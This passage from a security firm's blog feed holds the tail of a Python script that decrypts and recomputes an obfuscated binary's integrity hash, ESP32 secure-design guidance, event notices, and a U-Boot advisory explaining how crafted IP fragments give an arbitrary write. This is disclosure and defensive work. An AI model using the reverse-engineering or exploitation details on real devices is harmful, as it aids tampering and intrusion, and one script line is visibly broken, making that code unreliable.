  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Related Content

Hardware Security By Design: ESP32 Guidance

31 May 2022 at 20:51

Within the Hardware and Embedded Systems practice at NCC Group, some engagements with clients are early in the design phases of a product. In other cases, however our first interaction occurs late in the development cycle, once a product has been designed, implemented, and functionally tested. While assessments performed at this time can help identify vulnerabilities and reasonable mitigations, certain security-impacting design decisions have already been set in stone and are not easily or cheaply changed. This is especially true as it relates to component selection, hardware design, and configuration. Security by design sets the foundation for these crucial controls to be appropriately implemented.

More often lately, System on a chip (SoC) vendors make hardware security features available that can and should underpin the security of products built on their platforms. In this blog post, NCC Group considers some of these features and the corresponding product design decisions for the current generation of Espressif’s ESP32 microcontrollers. The ESP32 is a platform commonly used in the broad span of IoT products that NCC Group assesses regularly and one that has continued to develop its hardware and SDK security features over multiple product generations.

Espressif provides ample documentation about these features, but how they translate to product security best practices is worth further discussion. Much of this discussion focuses on specific configuration details of the ESP32 family of microcontrollers and the recommended best practices associated with those details, but many broad recommendations included here apply to secure hardware designs in general.

ESP32 Best Practices

The importance of any given best practice depends on a variety of factors, some of which can be quite specific to the threat model of a product. With that caveat, since this is a generalized discussion, a general ordering of importance is applied here.

Secure Boot

Secure boot is an important security feature that prevents an attacker from tampering with firmware to execute arbitrary code. By enabling secure boot, the firmware image integrity and authenticity is verified against customer keys that were programmed during manufacturing. The nuanced details of how this integrity is validated matter.

ESP32 Implementation

The ESP32 supports two versions of secure boot.

Version 1 (V1) is based on a symmetric AES scheme that is no longer recommended as of ESP32 Revision 3.

Version 2 (V2) relies on RSA-PSS to verify the bootloader and application image at boot time before execution.

There is also support for App Signing Verification, the install-time verification of applications received over-the-air. Espressif acknowledges that there may be cases where this is warranted, but NCC Group strongly discourages the use of this feature as it precludes the use of boot-time verification.

Secure boot is very simply enabled by programming a properly configured bootloader. The idf.py menuconfig tool allows for this configuration and flashing. Once a properly configured bootloader, formatted partition table and signed application are flashed in this manner, secure boot will automatically be enabled.

But “simply” is not necessarily an apt word choice when discussing secure boot configuration. Enabling secure boot on any SoC involves a well-established process to burn eFuses, provision keys and load an initial signed image at manufacturing time. The image signing process too must ensure the cryptographic hygiene of the signing keys and the provenance of the images being signed. The management of the firmware signing key (that is, its generation, storage, usage, and rotation) are all important considerations that NCC Group has previously discussed at length.

Some SoC vendors, Espressif included, can enable secure boot prior to shipment to the device manufacturing facility, mitigating some threats to this process. This requires the public signing key and a signed initial image to be provided to Espressif, and confirmation at manufacturing time that the process was performed as expected. Disabling UART download mode may be postponed to later in manufacturing to mitigate the risk of any over-the-air update failure, but this too should be explicitly verified. Product manufacturing processes depend on several factors related to security, cost, and logistics, among other considerations. Contract manufacturing facilities or an OEM’s own facilities may be able to provide similar capabilities that provide more flexibility, but critically, this step should be performed in a trusted environment.

Debug Capabilities

What may be the most obvious configuration step is also one of the most critical. Too often, features that facilitate development and debugging make their way into production units, which can then later be used by attackers.

Hardware debug capabilities should be disabled in production devices to prevent a physical attacker from attaching a debugger, which may allow them to read/write SRAM and flash memory, exposing secrets or undermining secure boot.

ESP32 Implementation

On the ESP32, because JTAG debugging is implicitly disabled by the bootloader when secure boot or flash encryption are enabled, enabling these features as recommended does not require further action configuration to meet this recommendation.

However, it is worth noting that the CONFIG_SECURE_BOOT_ALLOW_JTAG configuration will circumvent this behavior, and so it is important to ensure that it is not changed from its default, cleared state in the project configuration. Similarly, the recovery ROM debug console provides an extensive set of debug capabilities that absolutely should be disabled by setting CONSOLE_DEBUG_DISABLE.

Flash Encryption

Many microcontrollers provide some amount of internal flash, distinct from an external SPI flash chip that may also be incorporated into a product design for additional persistent storage. Internal flash cannot be accessed via board traces or pads and so often represents a more suitable location for the storage of sensitive user data or code. Any such data stored in external flash must have suitable cryptographic controls to meet its associated confidentiality and integrity requirements.

ESP32 Implementation

All user flash used by the ESP32 is off-chip, providing a SPI interface that sophisticated attackers may access to read or modify flash contents. Furthermore, most application code is executed-in-place on flash.

The flash encryption feature, if enabled and configured appropriately, provides a measure of security for a variety of assets (including code) that are stored on the ESP32 flash, mitigating potential attacks that aim to expose the contents of memory.

The ESP32 supports flash encryption for its off-chip SPI flash component, providing confidentiality to any sensitive assets stored therein. The nuances and limitations of this feature, many of which are documented by Espressif, are important to note.

Data Integrity

Importantly, the flash encryption provided by the ESP32 is based on AES ECB mode with a “tweaked” key per block like AES XTS, a common primitive used in disk encryption. Although the scheme provides confidentiality, it offers no guarantees of data integrity. Modification of the ciphertext stored in flash will decrypt successfully in the absence of any other validation of the data.

Depending on what is stored in flash and how that data is handled by firmware, this may allow an attacker to impact the behavior of the device, for example by exploiting a memory safety vulnerability or causing the device to fall back into a re-initialization state.

Similarly, any code read or executed from flash after secure boot has run would be subject to similar tampering if the SPI flash interface is physically accessible. It is admittedly difficult to modify a ciphertext such that it decrypts to a binary capable of successfully running without extensive effort. In association with data integrity, an attacker with access to SPI flash may be able to rewrite a block with a known previous ciphertext to impact device behavior. Replay attacks of this nature may effectively allow a downgrade of data stored in flash (a whitelist or trusted certificate authority for example) to a previous, vulnerable version.

Block Size Disparity

The limitations of AES ECB are present in this encryption scheme despite the varying tweak described further below. Because AES uses 16-byte blocks, and the tweak is incremented for every 32 bytes, adjacent block-pairs are encrypted with the same key using AES ECB. If the content of these pairs is identical, the ciphertext too will be identical, which may reveal meaningful information to an attacker. An attacker with knowledge of the device’s flash layout may be able to determine the number of empty flash blocks based on the number of identical block-pairs, which may allow inference of sensitive information pertaining to the device or its users.

Fault Injection Attacks

In both 2019 and 2020, methods were disclosed to bypass flash encryption. With physical access, an attacker may be able to bypass the read protection on the flash encryption key, allowing them to decrypt flash contents. While these may be mitigated in newer hardware, the most recent public recommendation includes storing sensitive data in flash no longer than is necessary.

Key Provisioning

Additionally, to mitigate any potential attacks against assets stored in encrypted flash, the ESP32 allows unique encryption keys to be generated and provisioned to each device by default. This detail should be highlighted since unique and unexposed flash encryption keys are often an effective control, limiting the impact of a single compromised key and mitigating fleet-wide attacks. The ESP32 also supports a host-generated key, but the documentation astutely notes that this is not recommended for production.

Tweaked Keys

The algorithm to encrypt flash blocks involves the XORing of the block index with certain bits of the root key. NCC Group notes that this is distinct from a typical tweaked cipher such as AES XTS, though even established ciphers have known weaknesses in disk encryption. These distinctions and weaknesses do not necessarily undermine the basic goal of this flash encryption scheme to protect the confidentiality of flash-persisted data, but, may provide further support for caution when using flash encryption as a broad security control.

Tweak Size

Finally, NCC Group noted that the bits used for the tweak, that is the bits that are XORed with the root key, are configurable via the FLASH_CRYPT_CONFIG eFuse. If all bits of this eFuse are cleared, there will be no tweak of the root key over the entire flash space, effectively reducing the encryption scheme to AES ECB. An attacker with access to flash may, in this case, exploit the shortcomings of AES ECB to determine which blocks are alike, determine the contents of flash blocks with a chosen plaintext attack, or perform replay attacks more easily. NCC Group notes that while this is an optional eFuse configuration that should be avoided, the bootloader explicitly disallows it without explicit intervention, shown here.

/* CRYPT_CONFIG determines which bits of the AES block key are XORed 
with bits from the flash address, to provide the key tweak. 
CRYPT_CONFIG == 0 is effectively AES ECB mode (NOT SUPPORTED) 
For now this is hardcoded to XOR all 256 bits of the key. 
If you need to override it, you can pre-burn this efuse to the 
desired value and then write-protect it, in which case this 
operation does nothing. Please note this is not recommended! 
*/ 

ESP_LOGI(TAG, "Setting CRYPT_CONFIG efuse to 0xF"); 
new_wdata5 |= EFUSE_FLASH_CRYPT_CONFIG_M; 

Flash Encryption Recommendations

Per Espressif’s guidance, configure the bootloader to generate the flash encryption key on the part, unique per device.

Consider the sensitivity of assets stored within flash. While the effort to compromise this data may be more difficult with flash encryption, two considerations are of note:

• If authenticity of data stored in flash is required, and this data is not part of signed and version-controlled firmware, additional measures to protect against replay and ciphertext tampering must be implemented. This is not likely a requirement of a stored Wi-Fi password but may be for a SSID for example.

• If the data is of a sufficiently high value, such as a secret key common across all devices, the above-described attacks or similarly complex variants may be employed to extract it. This aligns with reasonable security best practices and Espressif’s specifically recommended mitigations to the described fault injection vulnerabilities that all secrets stored in device flash be unique per-device.

Lastly, use an NVS partition to store sensitive data. This provides some mitigation of the shortcoming associated with adjacent blocks being encrypted with the same key. In cases where a sensitive portion of flash requires frequent rewrites, designate a writable NVS partition dedicated to this purpose.

Boot Modes and UART capability

Without the appropriate eFuse configuration, the UART provides a mechanism to both update ESP32 firmware and to exercise tooling that can read sensitive device information.

The ESP32 provides the option to specify the source from which firmware will be loaded via the logic level of some GPIOs.

In ESP32 ECO V3 parts, a new eFuse UART_DOWNLOAD_DIS TKTK was added to disallow the DOWNLOAD_BOOT mode. This mode effectively provides flash access over UART. While secure boot should disallow any untrusted firmware from being loaded, restricting this access further limits any potential vulnerability. More importantly, this restricts access to eFuse that would normally be available by espefuse.py and accompanying UART commands that it uses. This provides a specific capability in cases where eFuse BLK3, available for user applications, is used to store an immutable device secret. Without this mechanism, the typical eFuse readout protection would be the only other chip-level method to prevent UART access to such a secret, but this would render it unreadable to software as well.

The UART_DOWNLOAD_DIS configuration should be set on production devices, shown here.

&gt; espefuse.py dump -p /dev/cu.SLAB_USBtoUART 
Connecting...esp32r0_delay... False 
.. 
Detecting chip type... ESP32 
BLOCK0 ( ) [0 ] read_regs: 00000000 2aec0d28 00cca803 000 
0a200 00001535 00100000 00000004 
BLOCK1 (flash_encryption) [1 ] read_regs: 00000000 00000000 00000000 000 
00000 00000000 00000000 00000000 00000000 
BLOCK2 (secure_boot_v1 s) [2 ] read_regs: 00000000 00000000 00000000 000 
00000 00000000 00000000 00000000 00000000 
BLOCK3 ( ) [3 ] read_regs: 00000000 00000000 00000000 000 
00000 00000000 00000000 00000000 00000000 
espefuse.py v3.0 
&gt; espefuse.py burn_efuse UART_DOWNLOAD_DIS 1 -p /dev/cu.SLAB_USBtoUART 
Connecting...esp32r0_delay... False 
.. 
Detecting chip type... ESP32 
espefuse.py v3.0 
The efuses to burn: 
from BLOCK0 
- UART_DOWNLOAD_DIS 
Burning efuses: 
- 'UART_DOWNLOAD_DIS' (Disable UART download mode (ESP32 rev3 only)) 0b0 - 0b1 
 

Check all blocks for burn... 
idx, BLOCK_NAME, Conclusion 
[00] BLOCK0 is not empty 
(written ): 0x0000000400100000000015350000a20000cca8032aec0d2800000000 

(to write): 0x00000000000000000000000000000000000000000000000008000000 
(coding scheme = NONE) 
. 
This is an irreversible operation! 
Type 'BURN' (all capitals) to continue. 
BURN 
BURN BLOCK0 - OK (all write block bits are set) 
Reading updated efuses... 
Checking efuses... 
Successful 
&gt; espefuse.py dump -p /dev/cu.SLAB_USBtoUART 
Connecting...esp32r0_delay... False 
.....esp32r0_delay... True 
_____esp32r0_delay... False 
.....esp32r0_delay... True 
_____esp32r0_delay... False 
.....esp32r0_delay... True 
[email protected]! .... forever: Download mode is locked down and the chip is no longer accessible 

Rollback Protection

Anti-rollback is an important feature that prevents an attacker from “updating” a device with an older firmware image version. An attacker may wish to downgrade firmware if the older version happens to contain known vulnerabilities that can be easily exploited. Such scenarios are advantageous to an adversary that wishes to compromise the device to expose the sensitive contents of memory or to achieve code execution.

ESP32 Implementation

As part of the over-the-air update process the ESP32 supports a mechanism for rollback prevention, in which a secure_version field within an application is compared against that stored in eFuse. Because of the nature of the eFuse value used, secure_version is limited to 32 values. It should be noted that if firmware updates are distributed over an authenticated channel, the threat of downgrading to a vulnerable version, mitigated by rollback prevention, requires the existence of a vulnerability in this OTA functionality or physical access to the device flash. This threat is therefore generally considered to be minimal risk. In cases where signed firmware is distributed over an insecure channel or from a user application that may be more easily exploited, the threat of this downgrade is more likely.

Enabling rollback prevention per Espressif’s documentation involves configuring the bootloader with the CONFIG_BOOTLOADER_APP_ANTI_ROLLBACK option and calling esp_ota_mark_app_valid_cancel_rollback() at some reasonable time after boot to establish the currently running firmware as stable, preventing rollback thereafter without risking a denial of service in the event of an unstable firmware update.

As part of a software maintenance process, some criteria to increase the secure_version of application updates that aligns with the release schedule and product lifetime of these updates should be established. For example, assuming a quarterly release cycle and a product lifetime of 10 years, this may involve increasing this value on alternating releases, allowing some flexibility to increase it in hot-fix scenarios where a known vulnerability must be patched and disallowed from running.

If a 32-value range is determined to be insufficient, a secondary, weaker form of rollback prevention may be implemented at install time, in which a signed version header or timestamp is first validated against that of the currently installed application, disallowing downgrade through this flow. In the event of a critical vulnerability to the application or this check in particular, the bootloader-based rollback prevention may instead be used by incrementing the secure_version field. The secure_version field should be incremented at some reasonable minimum cadence regardless of the details of this design.

Secure Factory Reset

Devices may store sensitive data long after they have been decommissioned, allowing vulnerabilities discovered later to be exploited if obtained.

While regulations and definitions pertaining to the handling of personal information exist, the sensitivity of stored data can vary significantly by a user’s treatment of this data is in many ways outside of the scope and control of the OEM, as is the potential impact in the event of its exfiltration. Similar can be said of any other user data that may be potentially sensitive. A reset mechanism that erases these sensitive assets provides an option to the customer to incorporate it into any processes where their sensitive data stored on these devices may be unnecessarily exposed.

ESP32 Implementation

In the case of the ESP32, the flash erase API is straightforward and does not distinguish between secure erasure of blocks and deletion or invalidation of individual portions, but regardless of the implementation, explicitly overwriting stored data with zeroes is prudent. If, however, NVS is used, past entries are stored even if updated with more recent values, and so the entire NVS partition should be erased.

As part of product design, it is worthwhile to enumerate all potentially sensitive user data stored in device flash. This may include device logs, state information, mobile device pairing information, and authentication keys or tokens. Implement a mechanism to allow the customer to overwrite this data as part of a decommissioning process. While allowing this to be done remotely may be convenient, this should ideally be possible in scenarios where the device is in some unrecoverable state, thus encouraging the implementation of factory reset capability via a physical button.

Finally, it is important to test this functionality by dumping flash using ESP tools after performing this erasure, ensuring that even unused partitions (for example as part of a multi-partition firmware update “A/B” scheme) are similarly erased.

Wi-Fi Provisioning

Finally, one fairly core requirement of IoT devices is the initial establishment of Wi-Fi credentials. These credentials should be secured at rest once on the device, as discussed in the Flash Encryption section above. The secure transmission of the credentials is another important consideration. In the absence of a complete user interface on the device, some out-of-band key exchange between an initializing user application and the device is necessary to accomplish this.

ESP32 Implementation

Espressif provides a couple options for this out-of-the-box, using either SoftAP mode that strictly relies on Wi-Fi, or BLE.

With respect to SoftAP mode, it is important to set the wifi_prov_security argument to WIFI_PROV_SECURITY_1, as shown in Espressif’s sample implementation.

In addition to protecting the Wi-Fi credentials themselves, it is further important to consider the circumstances that the device can enter the provisioning mode to connect to another network. The threats associated with this consideration will vary, but often, physical access to the device to factory reset it or otherwise force a reprovisioning state is a reasonable method. Still, this does not necessarily address physical threats in a multi-tenant environment such as an office building, hotel, or outdoors, and so additional consideration is warranted to ensure that the device is connected to a trusted network even when that network is unavailable or must be changed.

Conclusion

The above discussion covers some of the main considerations that should be established early in the design of any ESP32-based product. Provisioning a root of trust, determining how and where to store secrets, and configuring eFuses are all critical to product security and not easily addressed late in the release cycle or in-field.

The focus of this discussion is specific to the ESP32, so more general topics like trusted device identity and secure communication with other endpoints are not covered. They are however similarly critical in embedded device security and warrant similar prioritized consideration. Furthermore, many of the topics discussed above apply to the general best practices of embedded device security regardless of SoC choice. The details however will vary in their design, level of support, and public transparency. Few of these topics are straightforward, and it has taken generations of iteration for such features to be made available and hardened by SoC vendors. In cases where the SoC vendor does not provide guidance on how to address a particular security requirement, it is often left to the OEM to implement in firmware, which can present a greater likelihood of vulnerability due to the comparative lack of oversight and scrutiny that product-specific designs and implementations are given.

Public Report – Lantern and Replica Security Assessment

31 May 2022 at 18:45
Editor's Note: This security assessment was conducted by a team of our consultants, one of whom, Victor Hora, tragically and unexpectedly passed away a few weeks ago. As we publish this report, we miss our dear colleague immensely and celebrate Victor's life and his wonderful influence on the world. He was a talented security consultant, beloved colleague, and friend to all, who made the world a better place through his kindness, his joy, and - as we see in this publication - his commitment to using his deep technical talents to help serve others and protect the most vulnerable. May his memory serve as an everlasting reminder of the many ways our joy and talent can be used to help others and leave the world a better place than we found it. 


From September 28th through October 23rd, 2020, Lantern – in partnership with the Open Technology Fund – engaged NCC Group to conduct a security assessment of the Lantern client. Lantern provides a proxy in order to circumvent internet censorship. This assessment was open ended and time-boxed, providing a best-effort security analysis in a fixed amount of time. Source code was provided to the engagement team.

In the winter of 2022, NCC Group was asked to re-evaluate several findings after remediation efforts had been completed for Lantern, which are also included in this Public Report.

Scope & Limitations

NCC Group’s evaluation included:

  • Lantern Common Core: The main component of the software is the cross-platform Lantern core. The core is written principally in Go with some components in other languages, including C, C++, Objective-C, and JavaScript. Testing was performed on the Windows, Android, and iOS client implementations.
  • Replica: A new component within Lantern which is a censorship-resistant P2P content sharing platform. Replica leverages the BitTorrent protocol to provide distributed data access. The following third-party libraries are used to provide BitTorrent functionality:
    https://github.com/anacrolix/torrent
    https://github.com/anacrolix/confluence

This application is intended for use in countries where the Internet is censored and therefore its threat model includes risks related to attribution and privacy attacks beyond just software security vulnerabilities. Included in that threat model are well-resourced attackers with advanced capabilities such as reading or modifying HTTP/HTTPS traffic unbeknownst to the targets. Testing was performed on a production version of the client made available at https://getlantern.org/.

NCC Group achieved adequate coverage of the Go code, which forms the backbone of the Lantern client. Some related components were not evaluated:

  • Server-side components were not in scope for the assessment.
  • The project relies on many third-party libraries. These libraries were not thoroughly evaluated.

The Public Report for this review may be downloaded below:

Conference Talks – June 2022

31 May 2022 at 23:59

This month, members of NCC Group will be presenting their technical work & training courses at the following conferences:

  • NCC Group, “Training: Mastering Container Security,” to be presented at 44CON (June 13-15 2022)
  • NCC Group, “Training: Google Cloud Platform (GCP) Security Review,” to be presented at 44CON (June 13-16 2022)
  • Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google), “Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software”, to be presented at Linux Security Summit North America (June 23-24 2022)
  • Jennifer Fernick (NCC Group) & Christopher Robinson (Intel), “Securing Open Source Software – End-to-End, at Massive Scale, Together,” to be presented at the Open Source Summit North America 2022 – Global Security Vulnerability Summit (June 23-24 2022)
  • Jose Selvi, “Cybersecurity, Intrusion Detection, & Machine Learning,” to be presented at Valencia 2022 Summer School – Challenges in Data Science: Big Data, Biostatistics, Artificial Intelligence, & Communications (June 27-July 1 2022)

Please join us!

Training: Mastering Container Security
NCC Group
44CON
June 13-15 2022

Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

This course takes a deep dive into the world of Linux containers, covering fundamental technologies and practical approaches to attacking and defending container-based systems such as Docker and Kubernetes.

In the 2022 version of the course the trainers will be focusing more on Kubernetes as it emerges as the dominant core of cloud native systems and looking at the wider ecosystem of products which are used in conjunction with Kubernetes.


Training: Google Cloud Platform (GCP) Security Review
NCC Group
44CON
June 13-16 2022


Ever more enterprises are moving their operations to the cloud, with customer adoption of Google Cloud Platform (GCP) steadily increasing. How can you ensure your cloud environment is secure?

NCC Group’s GCP security review training is a four-day course dedicated to security consultants and cloud architects interested in learning the principal elements of an environment based in Google’s cloud. It will discuss the techniques and tools necessary to perform a thorough security review and provide an understanding of the major risks, along with security best practices.

The course includes:

  • An introduction to GCP for people new to the platform, including general concepts and a comparison with other cloud providers
  • How to interact with GCP through the Cloud Console, CLI tool and SDK
  • An extensive discussion on the Identity and Access Management services with samples of policies and interesting attacks vectors
  • A review of networking in GCP, including typical topologies and common issues
  • A detailed look at the core services for computation, storage, databases, security and logging & monitoring
  • Tools which can help assess and secure GCP deployments


Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software
Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google)
Linux Security Summit North America
June 23-24 2022

Open source software (OSS) is incredibly powerful – and while that power is often used for good, it can be weaponized when OSS projects contain software security flaws that attackers can use to compromise those systems, or even the entire software supply chains that those systems are a part of. The Open Source Security Foundation is an open, cross-industry group aimed at improving the security of the open source ecosystem. In this presentation, members of the OpenSSF Vulnerability Disclosure working group will be sharing with open-source maintainers advice on how to handle when researchers disclose vulnerabilities in your project’s codebase – and we’ll also take any questions you have about this often mysterious topic!


Securing Open Source Software – End-to-End, at Massive Scale, Together
Jennifer Fernick (NCC Group) & Christopher Robinson (Intel)
Open Source Summit North America 2022 – Global Security Vulnerability Summit
June 23-24 2022 (Austin, TX & Virtual)

Open source software is a significant part of the core infrastructure in most enterprises in most sectors around the world and is foundational to the internet as we know it. It also represents a massive and profoundly valuable attack surface. Each year more lines of source code are created than ever before – and along with them, vulnerabilities. In this presentation, we’ll share key lessons learned in our experience coordinating the industry-wide remediation of some of the most impactful vulnerabilities ever disclosed, present a threat model of the many unmitigated challenges to securing the open source ecosystem, share new data which illustrates just how fragile and interdependent the security our core infrastructure can be, debate the challenges to securing OSS at scale, and speak unspoken truths of coordinated disclosure and where it can fail. We will also discuss the Open Source Security Foundation (OpenSSF) and share guidance for how members of the security community can get involved and contribute meaningfully to improving the security of OSS – especially through coordinated industry-wide efforts.


Cybersecurity, Intrusion Detection, & Machine Learning
Jose Selvi (NCC Group)

Valencia 2022 Summer School – Challenges in Data Science: Big Data, Biostatistics, Artificial Intelligence, & Communications
June 27-July 1 2022

The cybersecurity industry is facing many new challenges related with the amount of data they have to manage. In the “at scale” era, the traditional signature-based approach is no longer a solution by itself. In this talk, we will see an example of how we could use machine learning to achieve a false positive reduction in intrusion detection systems..

NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible Reports through the Intel Circuit Breaker program

2 June 2022 at 13:33

Congratulations to NCC Group researcher Jeremy Boone, who was recently recognized for both the Highest Quality Report, as well as the Most Eligible Reports, as an invited researcher to the Intel Circuit Breaker program!

Source: https://www.projectcircuitbreaker.com/camping-with-tigers/


From Intel:

This exclusive event invited a select group of security researchers to hunt vulnerabilities in the 11th Gen Intel® Core™ vPro® platform.Potential findings might involve any of the following:

  • Micro-architectural attacks
  • Firmware attacks like microcode
  • Platform configuration (Intel® vPro, Intel® Management Engine, etc.)
  • Platform design
  • Physical attacks (note that this is a deviation from our existing Bug Bounty policy)
  • Firmware attacks
  • Physical: I/O, storage, flash, memory, sensors, embedded controller, trusted platform module
  • Firmware: BIOS, IP firmware components, embedded controller, sensor, trusted platform module, storage, flash storage
  • Device drivers shipped with the device (such as Intel graphics drivers, Thunderbolt device drivers, Bluetooth device drivers, wireless drivers, ethernet drivers, chipset driver)



Jeremy Boone is a Technical Director in our Hardware & Embedded Systems practice, serving as mentor and leader to researchers across our hardware research program. He is perhaps best known for his research, TPM Genie, an I2C bus interposer for discrete Trusted Platform Modules

Congratulations Jeremy!

Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)

3 June 2022 at 18:50

By Nicolas Bidron, and Nicolas Guigo.

U-boot is a popular boot loader for embedded systems with implementations for a large number of architectures and prominent in most Linux based embedded systems such as ChromeOS and Android Devices.

Two vulnerabilities were uncovered in the IP Defragmentation algorithm implemented in U-Boot, with the associated technical advisories below:

  • Technical Advisory – Hole Descriptor Overwrite in U-Boot IP Packet Defragmentation Leads to Arbitrary Out of Bounds Write Primitive (CVE-2022-30790)
  • Technical Advisory – Large buffer overflow leads to DoS in U-Boot IP Packet Defragmentation Code (CVE-2022-30552)

Proof of concept code will be made available once the fixes have been published.

Technical Advisories:

Hole Descriptor Overwrite in U-Boot IP Packet Defragmentation Leads to Arbitrary Out of Bounds Write Primitive (CVE-2022-30790)

Project U-Boot
Project URL https://github.com/u-boot/u-boot
Versions affected all versions up to commit TBD
Systems affected All systems defining CONFIG_IP_DEFRAG
CVE identifier CVE-2022-30790
Advisory URL TBD
Risk Critical 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Authors Nicolas Guigo, Nicolas Bidron

Summary

U-boot is a popular boot loader for embedded systems with implementations for a large number of architectures and prominent in most linux based embedded systems.

Location

In u-boot/net/net.c the __net_defragment function line 900 through 1018.

Impact

The U-Boot implementation of RFC815 IP DATAGRAM REASSEMBLY ALGORITHMS is susceptible to a Hole Descriptor overwrite attack which ultimately leads to an arbitrary write primitive.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (IP packet header’s total Length) higher than IP_HDR_SIZE and strictly lower than IP_HDR_SIZE+8 leads to a value for len comprised between 0 and 7. This ultimately results in a truncated division by 8 resulting in a value of 0, forcing the hole metadata and fragment to point to the same location. The subsequent memcpy then overwrites the hole metadata with the fragment data. Through a second fragment, this attacker-controlled metadata can be exploited to perform a controlled write to an arbitrary offset.

This bug is only exploitable from the local network as it requires crafting a malformed packet which would most likely be dropped during routing. However, this it can be effectively leveraged to root linux based embedded devices locally.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows how the attacker can control the value of len to be strictly lower than 8 by issuing a packet with ip_len between 21 and 27 (IP_HDR_SIZE has a value of 20).

Also note that offset8 here is 0 which leads to thisfrag = payload.

	} else if (h >= thisfrag) {
		/* overlaps with initial part of the hole: move this hole */
		newh = thisfrag + (len / 8);
		*newh = *h;
		h = newh;
		if (h->next_hole)
			payload[h->next_hole].prev_hole = (h - payload);
		if (h->prev_hole)
			payload[h->prev_hole].next_hole = (h - payload);
		else
			first_hole = (h - payload);

	} else {

Later in the same function, execution reaches the above code path. Here, len / 8 evaluates to 0 leading to newh = thisfrag. Also note that first_hole here is 0 since h and payload point to the same location.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt the call to memcpy() overwrites the hole metadata (since thisfrag and h both point to the same location) with arbitrary data from the fragmented IP packet data. With a len value of 6, last_byte, next_hole, and prev_hole of the first_hole all end- up attacker-controlled.

Finally the arbitrary write is triggered by sending a second fragment packet, whose offset and length only need to fit within the hole pointed to by the previously controlled metadata (next_hole) set from the first packet.

Recommendation

This bug was disclosed to U-Boot support team and will be fixed in an upcoming patch. Update to the latest master branch version once the fix has been committed.

Large buffer overflow leads to DoS in U-Boot IP Packet Defragmentation Code (CVE-2022-30552)

Project U-Boot
Project URL https://github.com/u-boot/u-boot
Versions affected all versions up to commit TBD
Systems affected All systems defining CONFIG_IP_DEFRAG
CVE identifier CVE-2022-30552
Advisory URL TBD
Risk High 7.1 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
Authors Nicolas Guigo, Nicolas Bidron

Summary

U-boot is a popular boot loader for embedded systems with implementations for a large number of architectures and prominent in most linux based embedded systems.

Location

u-boot/net/net.c lines 915 and 1011.

Impact

The U-Boot implementation of RFC815 IP DATAGRAM REASSEMBLY ALGORITHMS is susceptible to a buffer overflow through a specially crafted fragmented IP Datagram with an invalid total length which causes a denial of service.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (IP packet header’s total length) lower than IP_HDR_SIZE leads to len taking a negative value, which ultimately results in a buffer overflow during the subsequent call to memcpy() that uses len as its count parameter.

This bug is only exploitable from the local network as it requires crafting a malformed packet with an ip_len value lower than the minimum accepted total length (21 as defined in the IP specification document: RFC791) which would most likely be dropped during routing.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
